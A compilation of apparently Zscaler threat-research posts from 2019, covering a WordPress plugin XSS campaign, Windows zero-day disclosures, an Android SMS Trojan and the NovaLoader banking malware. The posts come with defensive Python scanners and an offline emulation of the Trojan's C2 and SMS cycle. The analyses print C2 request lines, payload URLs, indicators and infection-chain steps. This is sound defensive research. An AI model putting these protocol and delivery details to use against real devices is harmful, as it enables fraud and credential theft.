Top exploit kit activity roundup – Spring 2019

Malicious JavaScript injected into WordPress sites using the latest plugin vulnerability

WordPress is by far the most popular content management system (CMS) and, because of its wide usage, it is also popular among cybercriminals. Most compromised WordPress sites are the result of attackers exploiting vulnerable versions of the plugins the sites use.

A stored cross-site scripting (XSS) vulnerability was disclosed last week in the popular WordPress Live Chat Support plugin. It allows an unauthenticated attacker to update the plugin settings by calling an unprotected "admin_init" hook, and so to inject malicious JavaScript everywhere on the site where Live Chat Support appears. All versions of the plugin prior to 8.0.27 are vulnerable; the fix was released on May 16, 2019, in version 8.0.27.

ThreatLabZ researchers recently discovered what may be the first campaign exploiting this vulnerability. The attackers inject a malicious script responsible for redirections, unwanted pop-ups, and fake subscriptions. While the attack is not yet widespread, the number of compromised websites is growing (a link to the list of compromised sites is at the end of this post).

Fig 1: Hits of the compromised WordPress sites
Fig 2: WordPress site using a vulnerable version of the Live Chat Support plugin
Fig 3: Obfuscated script injected in the compromised WordPress site
Fig 4: Deobfuscated version of the injected script

The injected script sends a request to hxxps://blackawardago[.]com to fetch and execute the main script.

Fig 5: Request and response to hxxps://blackawardago[.]com

After that script executes, the victim is redirected through multiple URLs, mainly pushing unwanted pop-up ads and fake error messages.

Fig 6: Multiple redirected URLs (highlighted in red) after execution of the malicious script
Fig 7: Pop-ups after execution of the malicious script

The domain hosting the malicious script is newly registered and hosted on a dedicated IP address.

Fig 8: Whois information for the domain

Conclusion

Cybercriminals actively look for new vulnerabilities in popular content management systems such as WordPress and Drupal, as well as in the popular plugins found on many websites. An unpatched vulnerability in either the CMS or an associated plugin gives attackers an entry point to compromise the website by injecting malicious code, affecting the unsuspecting users who visit it. Website owners using the vulnerable plugin should apply the security update immediately, particularly because this is a pre-authentication vulnerability and can lead to widespread compromise. The Zscaler ThreatLabZ team is actively tracking and reviewing all such malicious campaigns to ensure that our customers are protected.

IOCs

blackawardago[.]com
216[.]10[.]243[.]93

List of compromised sites is available here.
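Two checks a site owner or responder would run first for the campaign above, as an added example (this is not Zscaler's code or the plugin's code): a version comparison against the 8.0.27 fix named in the post, and a scan of a rendered page for script tags that load from the IOC domain or inline scripts that look like the obfuscated blob in the screenshots. The readme text and HTML are constructed for the example; since the real injected script is only shown in figures, the obfuscation check is a generic heuristic, not a signature for this campaign.

```python
"""Triage helpers for the Live Chat Support campaign described above.

Added example; this is not Zscaler's code or the plugin's code. It implements
the two checks a site owner or responder would run first:

  1. is_vulnerable_version(): compare an installed plugin version with the
     fixed release, 8.0.27, named in the post.
  2. find_injected_scripts(): scan a rendered page for <script> tags that
     load from the campaign's IOC domain, or inline scripts that look like
     the obfuscated blob shown in the post's figures.

The readme text and HTML below are constructed for the example; the real
injected script is only shown in the post's screenshots, so the obfuscation
heuristic is a general one, not a signature for this campaign.
"""
import re
from html.parser import HTMLParser

FIXED_VERSION = (8, 0, 27)            # first safe release per the post
IOC_DOMAINS = {"blackawardago.com"}   # from the post's IOC list (defanged there)


def parse_version(text):
    """'8.0.26' -> (8, 0, 26); ignores suffixes such as '8.0.27-beta'."""
    m = re.match(r"\s*(\d+(?:\.\d+)*)", text)
    if not m:
        raise ValueError(f"unparseable version: {text!r}")
    return tuple(int(p) for p in m.group(1).split("."))


def is_vulnerable_version(installed):
    """True for every version strictly below 8.0.27."""
    v = parse_version(installed)
    v += (0,) * (len(FIXED_VERSION) - len(v))   # pad '8.0' -> (8, 0, 0)
    return v < FIXED_VERSION


def stable_tag(readme_text):
    """Read 'Stable tag: x.y.z' from a wordpress.org-style readme.txt."""
    m = re.search(r"^Stable tag:\s*(\S+)", readme_text, re.M | re.I)
    return m.group(1) if m else None


class _ScriptCollector(HTMLParser):
    """Collects (src, inline_body) for every <script> element."""

    def __init__(self):
        super().__init__()
        self.scripts = []
        self._src = None
        self._buf = None

    def handle_starttag(self, tag, attrs):
        if tag == "script":
            self._src = dict(attrs).get("src")
            self._buf = []

    def handle_data(self, data):
        if self._buf is not None:
            self._buf.append(data)

    def handle_endtag(self, tag):
        if tag == "script" and self._buf is not None:
            self.scripts.append((self._src, "".join(self._buf)))
            self._buf = None


def _host(url):
    m = re.match(r"^(?:https?:)?//([^/:?#]+)", url or "")
    return m.group(1).lower() if m else None


def looks_obfuscated(body):
    """Generic heuristic: a long one-line script built from escapes or eval()."""
    body = body.strip()
    if len(body) < 200 or "\n" in body:
        return False
    escapes = re.findall(r"\\x[0-9a-fA-F]{2}|%[0-9a-fA-F]{2}|\\u[0-9a-fA-F]{4}", body)
    return len(escapes) > 20 or bool(
        re.search(r"\b(?:eval|unescape|String\.fromCharCode)\(", body))


def find_injected_scripts(html):
    """Return [(reason, detail)] for scripts loading from IOC domains or
    inline scripts that trip the obfuscation heuristic."""
    collector = _ScriptCollector()
    collector.feed(html)
    findings = []
    for src, body in collector.scripts:
        host = _host(src)
        if host and any(host == d or host.endswith("." + d) for d in IOC_DOMAINS):
            findings.append(("ioc-domain", src))
        elif src is None and looks_obfuscated(body):
            findings.append(("obfuscated-inline", body[:40]))
    return findings


# Constructed inputs: a readme reporting the last vulnerable release, and a page
# carrying one legitimate script, one loader from the IOC domain and one
# eval(unescape(...)) blob standing in for the injected script.
SAMPLE_README = "=== WP Live Chat Support ===\nStable tag: 8.0.26\n"
SAMPLE_HTML = (
    "<html><head>"
    "<script src='/wp-includes/js/jquery.js'></script>"
    "<script src='https://blackawardago.com/main.js'></script>"
    "<script>eval(unescape('" + "%64" * 80 + "'))</script>"
    "</head><body>Live Chat widget here</body></html>"
)

if __name__ == "__main__":
    tag = stable_tag(SAMPLE_README)
    print(f"plugin {tag}: vulnerable={is_vulnerable_version(tag)}")
    for reason, detail in find_injected_scripts(SAMPLE_HTML):
        print(f"{reason}: {detail}")
```

The version check pads short versions so that "8.0" compares as 8.0.0, and the domain match accepts subdomains of the IOC domain as well as the bare name; the inline heuristic is deliberately conservative (length, single line, escape density or eval-style calls) so that ordinary theme scripts do not trip it.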
Microsoft vulnerability: Source code published for three zero-day vulnerabilities in Windows

Background

A security researcher using the pseudonym SandboxEscaper has disclosed three zero-day vulnerabilities in Microsoft Windows and released proof-of-concept (POC) source code for them on GitHub. Two are local privilege escalation (LPE) vulnerabilities and have been tested to work on Windows 10 only; the third is a sandbox bypass in Internet Explorer 11 (IE11). As of this writing, Microsoft has not released a patch for any of the three.

What is the issue?

The researcher published three POCs: angrypolarbearbug2, bearlpe, and sandboxescape.

The first, angrypolarbearbug2, is exploited by performing specially crafted DACL (discretionary access control list) operations when the Windows Error Reporting service writes a DACL for a given Windows Error Reporting (.wer) file. Successful exploitation gives the attacker SYSTEM privileges.

The second, bearlpe, targets the way the Windows Task Scheduler service uses the SetJobFileSecurityByName() function to write the DACL for a job file. For this exploit to work, the attacker needs the "schtasks.exe" and "schedsvc.dll" files from Windows XP. Successful exploitation gives the attacker SYSTEM privileges.

The third, sandboxescape, bypasses the IE11 sandbox and allows an attacker to execute code in IE's low protection mode. To exploit it, an attacker needs to inject a special DLL into the IE process; according to reports, this exploit cannot be triggered remotely.

What systems are impacted?

The POCs have been tested on Windows 10 (32-bit and 64-bit) and IE11.

Zscaler coverage

Advanced Threat Signatures:
Win32.Exploit.Bearlpe
Win32.Exploit.CVE.2019.0863
Win32.Exploit.Polarbearescape
W32/Agent.NBHI

Zscaler Cloud Sandbox provides proactive coverage against exploit payloads and advanced threats like ransomware, and the Zscaler ThreatLabZ team is actively monitoring for in-the-wild exploit attempts to ensure coverage.
IoT traffic in the enterprise is rising. So are the threats.

Do you know exactly what IoT devices are on your network and how active they are? You had better, because they might be opening the door to cybercrime.

IoT devices are nonstandard computing devices that connect wirelessly to a network and can transmit data. They communicate and interact over the internet, and they can be remotely monitored and controlled. Connected devices are part of a scenario in which every device talks to related devices in its environment to automate home and industrial tasks and to deliver usable sensor data to users, businesses, and other interested parties. IoT devices are meant to work in concert for people at home, in industry, and in the enterprise.

Enterprises around the globe have been adopting IoT products to improve organizational efficiency, enhance communications, and gain insight into system performance. According to Gartner, 20.4 billion IoT devices will be in use worldwide by 2020, and more than 65 percent of enterprises will adopt IoT products. That translates to quite a bit of budget being dedicated to these devices: IDC has predicted that IoT spending will reach $745 billion in 2019, a 15 percent increase over 2018's $646 billion, and will surpass the $1 trillion mark in 2022. According to the same report, the U.S. and China will spend the most, at $194 billion and $182 billion respectively, followed by Japan, Germany, Korea, France, and the UK.

Analyzing IoT transactions

To help organizations better understand IoT activity in the enterprise, the ThreatLabZ research team analyzed IoT traffic across the Zscaler cloud during a one-month period between March and April 2019. The analysis looked at the types of devices in use, the protocols they used, the locations of the servers with which they communicated, the frequency of their inbound and outbound communications, and IoT traffic patterns.
The report, titled IoT in the Enterprise: an analysis of traffic and threats, gives a general overview of the most frequently seen device categories, then takes a deep dive into the transaction data for specific types of IoT devices. It also explores some of the security concerns around IoT devices, including the use of plaintext channels and the threat of malware.

Emerging threats

The rapid adoption of IoT devices has opened new attack vectors for cybercriminals. And, as is often the case, IoT technology has moved faster than the mechanisms available to safeguard the devices and their users. Researchers have already demonstrated remote hacks on pacemakers and cars. In October 2016, a large distributed denial-of-service (DDoS) attack launched by the Mirai botnet hit DNS servers on the east coast of the United States, disrupting services worldwide. The attack was traced back to hackers infiltrating networks through IoT devices, including wireless routers and connected cameras.

In August 2017, the U.S. Senate introduced the IoT Cybersecurity Improvement Act, a bill addressing security issues associated with IoT devices. While it is a start, the bill only requires internet-enabled devices purchased by the federal government to meet minimum requirements, not the industry as a whole. It is, however, viewed as a starting point that, if adopted across the board, could pave the way to better IoT security industry-wide.

One of the ThreatLabZ team's discoveries was that the vast majority of IoT transactions occur over plaintext channels rather than the more secure SSL-encrypted channels. The use of unsecured channels is a major weakness, but it is only one of the problems with IoT devices; they are also notorious for weak, preset passwords that often go unchanged.

Malware in IoT traffic

As with just about every device connected to the internet, malware is also a threat to IoT devices.
Each quarter, the Zscaler cloud blocks approximately 6,000 transactions from IoT-based malware and exploits, and earlier this year the Zscaler ThreatLabZ team analyzed certain threats targeting IoT devices. The fact is that almost no security has been built into the IoT hardware that has flooded the market in recent years, and there is typically no easy way to patch these devices. Many businesses have considered security for IoT devices unnecessary because nothing is stored on them, but this is not the case: the Mirai botnet attack illustrated how exposed companies can be as a result of their IoT devices.

Even though these devices remain an easy target for cyberattacks, enterprises can take steps to reduce the risk:

- Change default credentials to something more secure. As employees bring in devices, encourage them to make sure their passwords are strong and their firmware is always up to date.
- Install IoT devices on isolated networks (to prevent lateral movement), with restrictions on inbound and outbound network traffic.
- Restrict access to the IoT device from external networks as much as possible. Block unnecessary ports from external access.
- Apply regular security and firmware updates to IoT devices, in addition to securing the network traffic.
- Finally, deploy a solution that gives visibility into the shadow IoT devices already sitting inside the network, and ensure the above safeguards are applied to them.

Advanced security for IoT devices

IoT devices have become commonplace in enterprises across all industries and in nearly every corner of the globe. These devices were designed to improve efficiency and expand communications, and organizations continue to explore new ways to incorporate them into everyday operations. Of course, many of the devices are employee-owned, and this is just one of the reasons they are a security concern.
With all of these new connected devices, and the enormous amount of associated data traversing your network and opening new attack vectors for cybercriminals, can you trust your legacy network to provide adequate security? The security of your enterprise hinges on your answer.

Read the entire report, IoT in the Enterprise: an analysis of traffic and threats.

Critical Update: Windows Remote Desktop Services Vulnerability

Background

Earlier today Microsoft released several security updates as part of its regular monthly release, known as Patch Tuesday. One of the issues patched today, CVE-2019-0708, is critical, and all Windows users should apply this month's patches immediately, whether or not they are running one of the operating systems vulnerable to it. Large organizations following 15/30/60-day patch cycles should consider making an exception and applying the patches as soon as possible, especially if they run one of the vulnerable operating systems.

What is the issue?

CVE-2019-0708 is a remote code execution vulnerability in Microsoft Windows Remote Desktop Services that affects several older versions of the Windows operating system. What makes this vulnerability unique, and alarming, is that an attacker does not have to be authenticated to the target machine and needs no interaction from the target user for the machine to be compromised. In other words, it can, and most likely will, be exploited by malware authors to spread payloads rapidly from unpatched system to unpatched system. No exploitation has been detected yet, but this is the type of vulnerability that could lead to another attack like WannaCry, which caused massive disruption in organizations around the world in May 2017.

What systems are impacted?

Windows XP, Windows Server 2003, Windows 7, Windows Server 2008, and Windows Server 2008 R2 are vulnerable. Windows 8 and Windows 10 are NOT vulnerable.

What can you do to protect yourself?

Microsoft has been proactive in releasing security updates for the unsupported operating systems, given the critical nature of this vulnerability. Apply the security updates released by Microsoft immediately from the following locations:

For supported operating systems: https://portal.msrc.microsoft.com/en-us/security-guidance/advisory/CVE-2019-0708#ID0EGB

For unsupported end-of-life operating systems [Windows XP and 2003]: https://support.microsoft.com/en-us/help/4500705/customer-guidance-for-cve-2019-0708

Zscaler coverage

Zscaler Cloud Sandbox provides proactive coverage against worm payloads and advanced threats like ransomware, and the Zscaler ThreatLabZ team is actively monitoring for in-the-wild exploit attempts to ensure coverage.

Working together to understand the threat landscape

As a society, we are more connected than ever before. Our community is no longer just the people living nearby; it is a global community of individuals connected not by proximity but by the internet. As in almost any community, crime is a factor. In today's digital society, that means cybercriminals, and they seem to launch new attacks every day. These cybercriminals have evolved from lone hackers into sophisticated criminal organizations that attack individuals, corporations, and governments. As the criminals have become more organized, fighting them has become harder. If cybercriminals work together to increase their chances of success, it makes sense that those who fight them should work together too.

Today, Verizon released its 2019 Data Breach Investigations Report, and I am proud that the Zscaler ThreatLabZ team once again actively contributed to its findings.

The Verizon 2019 Data Breach Investigations Report takes an in-depth look at security incidents and data breaches that occurred in 2018. It analyzes 41,686 security incidents, of which 2,013 were confirmed data breaches, looks at how the results have or have not changed over the years, and digs into the overall threat landscape and the actors, actions, and assets present in breaches. The report delves into security incident patterns and describes how they correlate with the various industry verticals. In addition to these primary patterns, it includes a subset of data on financially motivated social engineering (FMSE) attacks, which focus on credential theft and duping people into transferring money into adversary-controlled accounts.

Among the findings, the report revealed that 43 percent of data breaches occurred at small businesses, which tend to have less stringent security than larger organizations, making them an easier target.
The most common tactic used in breaches was hacking (52 percent), while errors (21 percent) and misuse by authorized users (15 percent) also led to breaches. And, as might be expected, financial gain was the most common motivation (71 percent).

These results, and the others detailed in the report, are based on data collected from a variety of sources, including publicly disclosed security incidents, cases provided by the Verizon Threat Research Advisory Center (VTRAC) investigators, and external collaborators such as ThreatLabZ. The year-to-year data includes new sources of incident and breach data as more organizations share information to improve the diversity and coverage of real-world events. The number of contributing organizations continues to grow, with 66 organizations external to Verizon now contributing to the report. This community of data contributors is an international group of public and private entities that understand the importance of sharing information to better understand the threats we all face daily.

This is the second consecutive year that Zscaler has provided transaction data for the report. The ThreatLabZ team examined transactions processed in the Zscaler cloud during 2018, specifically looking for attempted phishing attacks and blocked malware. We also offered insights into each threat category, with supporting telemetry indicating the number of users affected by these security incidents and data breaches.

It is heartening to see so many organizations coming together to share information in an ongoing effort to secure the internet and the digital world in which we all participate. Unfortunately, cybercriminals will continue developing new threats and attack methods as long as there is a potential payoff.

From third-party Android store to SMS Trojan

Instead of downloading and installing apps from the official Android app store, users often turn to third-party stores. The reasons vary, from wanting a particular app that is not available on the official store to seeking cracked apps, versions of official Android apps that have been modified to disable certain features such as copyright protection.

Recently, the ThreatLabZ research team came across one of these third-party app stores that appeared to be hosting Android games. The store, called "Smart Content Store," presents itself as an Android app store and uses names such as sexy.smartcontentstore[.]com and games.smartcontentstore[.]com.

Fig 1: Third-party app store homepage

At first glance the site appears to be an app store hosting Android games, but we were unable to download any apps: clicking the Install option on any of the games, as seen in the screenshot above, leads back to the same page. On further examination, we found many direct links to APKs being downloaded from these domains. The image below shows the direct downloads of these APKs.

Fig 2: Zscaler dashboard

These apps have different package names and certificates, but every app exhibits the same functionality. We have provided an analysis of one of the apps below. (A complete list of apps can be found in the IOCs at the end of the post.)

App summary

APK name: smartworld_-_WIN_-_500929091890143_-_.apk
Package name: vaya.bailecito.epore.saturda
Size: 2100203 bytes
MD5: 091E91A9ED7202CD44DC5E1C4B3DCC90

Technical details

As soon as the app is installed, it appears as a blank space: as shown in the screenshot below, the app icon and app name are missing. Tapping the space (the invisible icon) brings up the app's first activity with two options: Smart World and Sexy World.
Fig 3: Invisible app icon and the first activity

During the initial phase, the app sends several requests to hxxp://play4funclub[.]com/public/notification/is-active, but during our analysis we received only a 301 Moved Permanently response. These requests can be seen in the screenshot below.

Fig 4: Initial requests

Tapping either of the two options, Smart World or Sexy World, makes the app ask for Administrator privileges, stating "To view all the porn videos you need to update. Click to activate." This message can be seen in the screenshot below (left image).

Fig 5: Admin privileges

As soon as the victim activates admin rights, a request is sent to another domain. Nothing happened as a result of this request, so we believe it simply tells the attacker whether the victim has activated admin rights.

Fig 6: Request upon enabling admin rights

After a certain amount of time, the app starts sending POST requests to hxxp://app.in-spicy[.]com/scripts/app_sms_request_get_number.php with details about the victim's device and location. The request carries the following information:

- Android version
- Installation date
- Version
- Date (date of the request)
- Country code
- Carrier
- Device ID

The screenshot below shows the request and response between the compromised device and the attacker:

Fig 7: Request and response related to the SMS message

The app acts according to the response received from the attacker's domain. If the response contains "status":"OK", the app extracts the details it needs from the response; in our case, a phone number and a message body. It then sends an SMS message with that body to that number. This functionality is visible in the screenshot below, where the response from the attacker is held in paramJSONObject and, based on that response, sendTextMessage is called; this routine sends the actual SMS messages.
Fig 8: Sending SMS functionality

During this phase of analysis, we observed several attempts to send SMS messages to different phone numbers with different message bodies. This can result in high costs for the victim. Some examples of the SMS messages are listed in the table below:

Phone #          Message body
6768482371       message:france athletes employed
6857215675       message:experience iran yarn combines field
6768482371       message:luther exercise queens
2347003300131    message:hungary contributing task bird
6857215675       message:boolean wisconsin criticism verification republic
2347003300131    message:exchange audience nc medicaid
2347003300131    message:ut controlled salt customized consider
6768482371       message:legislative wayne brand hungarian
6768482371       message:consulting gui contrary eclipse
79697530171      message:boards tits difficulties
6768482371       message:royalty relay mv
6768482371       message:boards sie gabriel computer
6768482371       message:mods html chronic
6768482371       message:integer coleman monsters
6745596671       message:capabilities labels addiction
6768482371       message:checking upskirt football possibilities
6745596671       message:academics actively matrix ga
2347003300131    message:incidence quality mrs estimated default
6745590060       message:estate mexican legal flour
6768482371       message:cleared connectivity divx
2347003300131    message:cafe activists our constantly
6745596671       message:brush accepted role
6745596671       message:plain weed senators reform framing
6745596671       message:represents fig answers signup
6745596671       message:animation failure lucas browser poetry
2347003300131    message:biodiversity present solving herbal regulations
6857215675       message:shakira wanna movie freight
6768482371       message:shipping uzbekistan senators optimize basically
6857215675       message:folks tamil cooper
6857215675       message:picking maine shapes men wives

This app also has permission to read the victim's contact list, which means it could easily spread itself using those contacts.
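The check-in and dispatch cycle described above, as an added example that is neither the app's code nor Zscaler's: it builds the check-in body from the field list in the post, parses the C2 answer the way the app does ("status":"OK" plus a number and body), hands the task to a stub in place of sendTextMessage, and shows the device-side check a defender would add, flagging destinations outside the victim's own country. The JSON key names "number" and "message" are assumptions (the post does not show them), the country-to-dialing-code table is a tiny assumed map, and the C2 responses are constructed, with the destination numbers and bodies taken from the table above.

```python
"""Emulation of the SMS Trojan's check-in and dispatch cycle.

Added example; this is neither the app's code nor Zscaler's. The post states
what the app POSTs to app_sms_request_get_number.php, that a response with
"status":"OK" carries a phone number and message body, and that those are
passed to sendTextMessage. The JSON key names for the number and body are
not shown in the post, so "number" and "message" are assumptions. The
transport is replaced by in-memory stubs so the cycle runs offline, and the
C2 responses below are constructed (the destination numbers and bodies are
taken from the post's table).
"""
import json
from datetime import date

# Check-in fields listed in the post; the values are constructed.
DEVICE_PROFILE = {
    "android_version": "8.1.0",
    "installation_date": "2019-04-01",
    "version": "1.0",
    "date": date(2019, 4, 3).isoformat(),
    "country_code": "US",
    "carrier": "example-carrier",
    "device_id": "0123456789abcdef",
}

# Assumption: dialing prefix per ISO country code, for the defender-side check.
HOME_DIALING_CODE = {"US": "1", "GB": "44", "DE": "49"}


def build_checkin(profile):
    """Body the app would POST on each poll (same field set as the post)."""
    return {key: profile[key] for key in DEVICE_PROFILE}


def parse_task(response_text):
    """Return (number, body) if the C2 answered status OK, else None."""
    try:
        obj = json.loads(response_text)
    except ValueError:
        return None          # e.g. an HTML error page or a redirect body
    if not isinstance(obj, dict) or obj.get("status") != "OK":
        return None
    number, body = obj.get("number"), obj.get("message")   # assumed keys
    if not number or body is None:
        return None
    return str(number), str(body)


def run_cycle(response_text, send_sms):
    """One poll: parse the task and hand it to the SMS sender."""
    task = parse_task(response_text)
    if task is not None:
        send_sms(*task)
    return task


def is_suspicious_destination(number, country_code):
    """Flag numbers outside the victim's own country (international format,
    no leading '+', as the post's table shows them)."""
    home = HOME_DIALING_CODE.get(country_code)
    return home is None or not number.startswith(home)


def replay(responses, profile):
    """Drive the cycle over recorded C2 answers; return what was 'sent' and
    which destinations a device-side check would have flagged."""
    sent, flagged = [], []

    def stub_send(number, body):
        sent.append((number, body))
        if is_suspicious_destination(number, profile["country_code"]):
            flagged.append(number)

    for response in responses:
        run_cycle(response, stub_send)
    return sent, flagged


SAMPLE_RESPONSES = [
    '{"status":"OK","number":"6768482371","message":"message:luther exercise queens"}',
    '{"status":"OK","number":"2347003300131",'
    '"message":"message:hungary contributing task bird"}',
    '{"status":"WAIT"}',
    "<html>301 Moved Permanently</html>",
]

if __name__ == "__main__":
    print("check-in:", json.dumps(build_checkin(DEVICE_PROFILE)))
    sent, flagged = replay(SAMPLE_RESPONSES, DEVICE_PROFILE)
    for number, body in sent:
        print("SMS ->", number, repr(body), "(flagged)" if number in flagged else "")
```

Note that the app itself does no validation of the destination; every number in the table starts with a foreign country code, which is exactly what the defender-side check keys on.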
We also found other high-level permissions, and we are analyzing the sample further to determine their functions and potential impact. We will update this report with any interesting findings.

Conclusion

The Zscaler Cloud Sandbox successfully flagged the sample as malicious based on indicators found in the sample, as shown in the report screenshot below.

Fig 9: Zscaler Cloud Sandbox

Zscaler advises Android users to download apps only from official app stores. Third-party stores may lead to the installation of apps with hidden, malicious intent, as in this case. We also advise users to keep the Unknown Sources option turned off at all times on their Android device; keeping it off prevents third-party apps from being installed directly on the device.

NovaLoader, yet another Brazilian banking malware family

As part of our daily threat tracking, ThreatLabZ researchers recently came across an interesting Brazilian banking malware campaign. The malware, NovaLoader, is written in Delphi and makes extensive use of Visual Basic Script (VBS). Although the final payload is not entirely new and has been discussed by other security researchers, we found the multi-stage payload delivery unique.

Delivery method

In earlier documented campaigns, the delivery methods for this malware included spam, social engineering, and fake sites for popular software such as Java. The operators use a variety of options to ensure delivery and to evade security products, often abusing popular legitimate services such as Dropbox, GitHub, Pastebin, AWS, and GitLab, as well as URL shorteners and dynamic DNS services such as No-IP and DynDNS. NovaLoader is known to use AutoIt, PowerShell, and batch scripts in its infection chain, but this is the first time we have seen it use VBS. In this campaign it also uses encrypted scripts rather than merely obfuscated ones.

Fig. 1: NovaLoader infection flow

Main dropper

MD5: 4ef89349a52f9fcf9a139736e236217e

The main dropper is very simple; its only purpose is to decrypt the embedded VB script and run it.

Fig. 2: Stage 1 VB script decryption loop

Stage 1 script

Embedded script before and after decryption:

Fig. 3: VB script before and after decryption

This VBS file decrypts a URL (dwosgraumellsa[.]club/cabaco2.txt), downloads another encrypted script from it, and runs that script after decryption.

Fig. 4: Download request for the next stage, an encrypted payload

Stage 2 script

The downloaded VB script looks like the following after decryption:

Fig. 5: VBS after decryption

The VB script sends a GET request to "http://54.95.36[.]242/contaw.php", possibly to let the command-and-control (C&C) server know that it is running on the system.
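A proxy-log detection for these check-ins, as an added example that is not Zscaler's detection content: it matches GET requests for /contaw.php and the /contaw2.php to /contaw7.php variants against 54.95.36.242, splits the "w" parameter on "_" to recover the victim hostname and the fields that follow it, and also flags the three payload fetches from 32atendimentodwosgraumell[.]club. The log format (timestamp, client IP, method, URL) and every log line are constructed; the hostname "WIN7-PC" stands in for the value the post redacts.

```python
"""Detection of NovaLoader stage-2 check-ins in web proxy logs.

Added example, not Zscaler's detection content. It matches the requests the
post documents: GET /contaw.php and /contaw2.php .. /contaw7.php against
54.95.36.242, whose "w" parameter carries the victim hostname and further
fields joined with "_", and the three payload downloads from
32atendimentodwosgraumell.club. The log format (timestamp, client IP,
method, URL) and every log line below are constructed; the hostname
"WIN7-PC" stands in for the value the post redacts.
"""
import re
from urllib.parse import parse_qs, urlsplit

C2_IP = "54.95.36.242"
PAYLOAD_HOST = "32atendimentodwosgraumell.club"
PAYLOAD_PATHS = {"/mi5a.php", "/mi5a1.zip", "/mi5asq.zip"}
BEACON_PATH = re.compile(r"^/contaw([2-7])?\.php$")


def parse_log_line(line):
    """'<ts> <client> <method> <url>' -> dict, or None for a malformed line."""
    parts = line.split(maxsplit=3)
    if len(parts) != 4:
        return None
    ts, client, method, url = parts
    return {"ts": ts, "client": client, "method": method.upper(), "url": url}


def classify_request(rec):
    """Return a finding for a NovaLoader beacon or payload fetch, else None."""
    u = urlsplit(rec["url"])
    host = (u.hostname or "").lower()
    if host == C2_IP and rec["method"] == "GET":
        m = BEACON_PATH.match(u.path)
        if not m:
            return None
        stage = int(m.group(1)) if m.group(1) else 1
        # parse_qs already URL-decodes; the script joins fields with "_".
        w = parse_qs(u.query).get("w", [""])[0]
        fields = [f.strip() for f in w.split("_")] if w else []
        return {
            "type": "novaloader-beacon",
            "stage": stage,
            "client": rec["client"],
            "victim_host": fields[0] if fields else None,
            "fields": [f for f in fields[1:] if f],
        }
    if host == PAYLOAD_HOST and u.path in PAYLOAD_PATHS:
        return {"type": "novaloader-payload", "client": rec["client"], "path": u.path}
    return None


def scan(lines):
    """Run every log line through the classifier; skip what does not parse."""
    findings = []
    for line in lines:
        rec = parse_log_line(line)
        if rec is None:
            continue
        hit = classify_request(rec)
        if hit is not None:
            hit["ts"] = rec["ts"]
            findings.append(hit)
    return findings


# Constructed log lines: the first check-in, one payload fetch, two beacons
# carrying host data, a benign request, a near-miss path and a malformed line.
SAMPLE_LOG = [
    "2019-02-01T17:04:58Z 10.20.30.40 GET http://54.95.36.242/contaw.php",
    "2019-02-01T17:05:01Z 10.20.30.40 GET http://32atendimentodwosgraumell.club/mi5a1.zip",
    "2019-02-01T17:05:02Z 10.20.30.40 GET http://54.95.36.242/contaw2.php"
    "?w=WIN7-PC_Microsoft%20Windows%207%20Professional%20_True",
    "2019-02-01T17:05:06Z 10.20.30.40 GET http://54.95.36.242/contaw6.php"
    "?w=WIN7-PC_2/1/2019%205:05:06%20PM",
    "2019-02-01T17:05:07Z 10.20.30.41 GET https://www.example.com/index.html",
    "2019-02-01T17:05:08Z 10.20.30.41 GET http://54.95.36.242/contaw.php/../other",
    "garbage line",
]

if __name__ == "__main__":
    for hit in scan(SAMPLE_LOG):
        print(hit)
```

Keying on the exact path rather than a substring keeps the near-miss line out, and recovering the hostname from the beacon gives the responder the victim machine name directly from the log, without touching the endpoint.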
It then tries to detect a virtual environment using Windows Management Instrumentation (WMI) queries, as shown below.

Fig. 6: VM detection code

NovaLoader copies the following executable files into the directory C:\Users\Public\:

C:\Windows\(system32|SysWOW64)\rundll32.exe
C:\Windows\(system32|SysWOW64)\Magnification.dll

Fig. 7: C&C notification request

It then downloads the following files from 32atendimentodwosgraumell[.]club:

32atendimentodwosgraumell[.]club/mi5a.php, decrypted and saved at C:\Users\Public\{random}4.zip
32atendimentodwosgraumell[.]club/mi5a1.zip, saved at C:\Users\Public\{random}1.zip
32atendimentodwosgraumell[.]club/mi5asq.zip, saved at C:\Users\Public\{random}sq.zip

It then sends multiple GET requests to "54.95.36[.]242/contaw{1-7}.php":

Fig. 8: Multiple C&C requests

GET /contaw.php
GET /contaw2.php?w={redacted}BIT-PC_Microsoft%20Windows%207%20Professional%20_True
GET /contaw3.php?w={redacted}BIT-PC
GET /contaw4.php?w={redacted}BIT-PC
GET /contaw5.php?w={redacted}BIT-PC
GET /contaw6.php?w={redacted}BIT-PC_2/1/2019%205:05:06%20PM
GET /contaw7.php?w={redacted}BIT-PC_2/1/2019%205:05:06%20PM_CD=414KbCD1=9160Kb_

It also drops several files into C:\Users\Public\:

Dropped file    MD5                                 Comment
DST.exe         51138BEEA3E2C21EC44D0932C71762A8    Copied rundll32.exe
I               3DC26D510907EAAC8FDC853D5F378A83    Encrypted file containing values such as version and extension
I_              A34F1D7ED718934185EC96984E232784    Encrypted configuration file
KC              89473D02FEB24CE5BDE8F7A559631351    Similar to the file named "I"
mwg.dll         F3F571288CDE445881102E385BF3471F    Copied Magnification.dll
PFPQUN.DST      8C03B522ACB4DDC7F07AB391E79F1601    Support DLL used to decrypt the main payload
PFPQUN1.DST     F3D4520313D05C66CEBA8BDA748C0EA9    Encrypted main payload
winx86.dll      87F9E5A6318AC1EC5EE05AA94A919D7A    SQLite DLL

Fig. 9: Files dropped by the script

Finally, it executes the decrypted DLL's exported function using the copied rundll32.exe.

Fig. 10: Executing the stage-3 payload

The stage-3 payload is a DLL that acts as a loader for the final payload: it is run via rundll32.exe, and its purpose is to decrypt and load the final payload.

Final payload

The final payload is written in Delphi. It has multiple capabilities, including stealing victims' credentials for several Brazilian banks. It monitors browser window titles for bank names and, if a targeted tab is found, the malware can take control of the system and block the victim from the real bank's page while it carries out its activity under instruction from its C&C. Its behaviour is quite similar to the well-known Overlay RAT. Some of the interesting commands used by the malware, by function:

- Stabilize the socket connection
- Send infected OS details
- Check the status of the connection
- Close all connections
- Send keystrokes to the active application window
- Set mouse position
- Set mouse left button down
- Set mouse left button up
- Set mouse right button up
- Set mouse right button down
- Share the compromised system's desktop
- Check value received in the C&C response, used to verify that data is correct, which the client replies to

Fig. 11: NovaLoader C&C commands

Many strings related to Brazilian banks were found in the malware:

String in malware            Corresponding bank site
caixa                        http://www.caixa.gov.br
bancodobrasil                https://www.bancobrasil.com.br
bbcombr                      https://www.bb.com.br/
bradesco                     https://banco.bradesco/
santander                    https://www.santander.com.br/
bancodaamazonia              https://www.bancoamazonia.com.br/
brbbanknet                   https://brbbanknet.brb.com.br/netbanking/
